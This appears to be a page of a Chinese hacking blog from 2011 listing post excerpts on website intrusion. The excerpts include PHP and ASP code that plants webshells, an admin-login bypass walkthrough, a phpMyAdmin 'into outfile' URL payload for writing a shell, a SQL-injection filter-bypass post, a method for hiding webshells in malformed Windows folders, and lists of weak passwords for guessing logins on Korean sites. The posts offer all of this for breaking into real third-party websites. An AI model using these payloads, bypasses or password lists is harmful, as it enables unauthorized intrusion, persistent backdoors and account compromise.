上一页 1 ··· 17 18 19 20 21 22 23 24 25 ··· 30 下一页

2011年5月3日

简单绕过后台验证入侵

摘要: 网站:http://www.xxx.com/后台:http://www.xxx.com/admin/admin.asp进入后台的时候,一闪而过然后通过IE设置选项把IE级别调成最高在重新进入http://www.xxx.com/admin/admin.asp可以直接跳过后台验证,跳过后台验证其实是不能利用的,但是如果细心的话,通过左边的框架查看源代码发现一个友情链接的,友情连接[<a href="link/list.asp然后进入http://www.xxx.com/admin/link/list.asp编辑友情链接,图片右链属性发现一个http://www.xxx.com/L 阅读全文

posted @ 2011-05-03 15:19 =_=! 阅读(1496) 评论(0) 推荐(0) 编辑

2011年4月30日

同目录下生成一个php小马

摘要: <?fputs(fopen("mm.php","w"),"<?eval(\$_POST[888888]);?>")?>保存为php文件上传。这段代码的意思是在当前目录下生成一个名为mm.php的文件[原创]特殊的php上传漏洞再到获取linux root最后栽下rootkit文章作者:sunwear信息来源:邪恶八进制信息安全团队(www.eviloctal.com)Author: sunwear [E.S.T]QQ:47347 阅读全文

posted @ 2011-04-30 22:02 =_=! 阅读(483) 评论(0) 推荐(0) 编辑

同目录下生成一个asp小马

摘要: <%On Error Resume NextIF Request("action")="ocean" thenset gl=server.CreateObJeCt("Adodb.Stream") gl.Open gl.Type=2gl.CharSet="gb2312" gl.writetext request("shellcode")gl.SaveToFile server.mappath(request("shellpath")),2 gl.Close set gl= 阅读全文

posted @ 2011-04-30 19:03 =_=! 阅读(200) 评论(0) 推荐(0) 编辑

2011年4月29日

上传漏洞的形成

摘要: 上传漏洞,这是一种比注入更有杀伤力的漏洞。通过注入所得到的往往是数据库中的一些敏感信息,如管理员名称、密码等等(注:此处注入指的是MDB数据库),但上传漏洞就不同了,它可以把ASP、JSP、CGI、PHP等格式的木马上传至网站目录内,所得到的权限最低也是WEBSHELL,如果碰到的是安全意识不强的管理员,(刺猬2005作品)呵呵!那就可以客串一把管理员了!心动了吧!OK!那就LET'S GO!对于上传漏洞的查找,仍是从源文件入手,目标有两个,一个是FilePath(文件路径),另一个则是FileName(文件名称)。一、FilePath说到FilePath,有些朋友可能感到陌生,但要提 阅读全文

posted @ 2011-04-29 19:13 =_=! 阅读(480) 评论(0) 推荐(0) 编辑

突破 终端最大连接数

摘要: mstsc /admin /v:www.bangzi.co.kr 阅读全文

posted @ 2011-04-29 03:51 =_=! 阅读(121) 评论(0) 推荐(0) 编辑

2011年4月28日

韩国棒子网站的一些弱口令

摘要: 暂时把账号表达为:username 账号一般为:域名和 admin,其他就要猜了,域名的概率为:10%,admin:30%。 密码一般是:0000,这个很多,1111,这个更多,qweqwe,也很多,com!@#,这个要注意了,也有很多人用,123123,也有,!@#!@#,也有,comcom!@#。 在列下:username0000username1111username123123username1234username!@#username123 基本上棒子有 30% 都是这样的弱口令吧,自由发挥,只是经验而已。 阅读全文

posted @ 2011-04-28 15:02 =_=! 阅读(397) 评论(0) 推荐(0) 编辑

SQL注入过滤限制绕过方法

摘要: 突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……经过我的收集,大部分的防注入程序都过滤了以下关键字:and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享 阅读全文

posted @ 2011-04-28 12:57 =_=! 阅读(683) 评论(0) 推荐(0) 编辑

隐藏webshell终极方法

摘要: 拿下一个站后总希望自己的后门能够很隐蔽!网上关于隐藏后门的方法也很多,如加密、包含,解析漏动、加隐藏系统属性等等! 不过这些方法能有多隐蔽呢?事实上,随便拉一个段在线查马的程序就能很快的查出来,自己煞费苦心倒成了白费心机了!那么究竟怎样才能真正的隐蔽呢?下面分享一下我的方法:其实我所要分享的方法有黑友在用了,如果你管理过服务器或网站经常会遇到!这种方法原理很简单,就是利用了windows建立畸形文件夹漏洞! X..\顽固文件夹-你懂得!这里是我上大学时的一点探索,看看或许对你有帮助! 用WebShell建立X..\之后,复制自己的Shell到该顽固文件夹中(顽固文件夹用8.3短名,否则复制不进 阅读全文

posted @ 2011-04-28 01:13 =_=! 阅读(1415) 评论(0) 推荐(0) 编辑

2011年4月25日

phpmyadmin另类拿shell

摘要: 发现了个PHPMYADMIN 结果弱口令登陆进去 爆出绝对路径 然后执行SQL语句发现导出SHELL的时候却发现缺少了import.php这个文件 结果没办法执行MYSQL语句!然后本地测试了下 发现另外的方法==========================================phpMyAdmin/sql.php?db=test&table=a&printview=1&sql_query=select%20cmd%20from+a%20into%20outfile%20'E:\\test1.php';&display_text=F 阅读全文

posted @ 2011-04-25 12:55 =_=! 阅读(198) 评论(0) 推荐(0) 编辑

2011年4月23日

又一上传漏洞经验分享

该文被密码保护。 阅读全文

posted @ 2011-04-23 23:14 =_=! 阅读(3) 评论(0) 推荐(0) 编辑

上一页 1 ··· 17 18 19 20 21 22 23 24 25 ··· 30 下一页

导航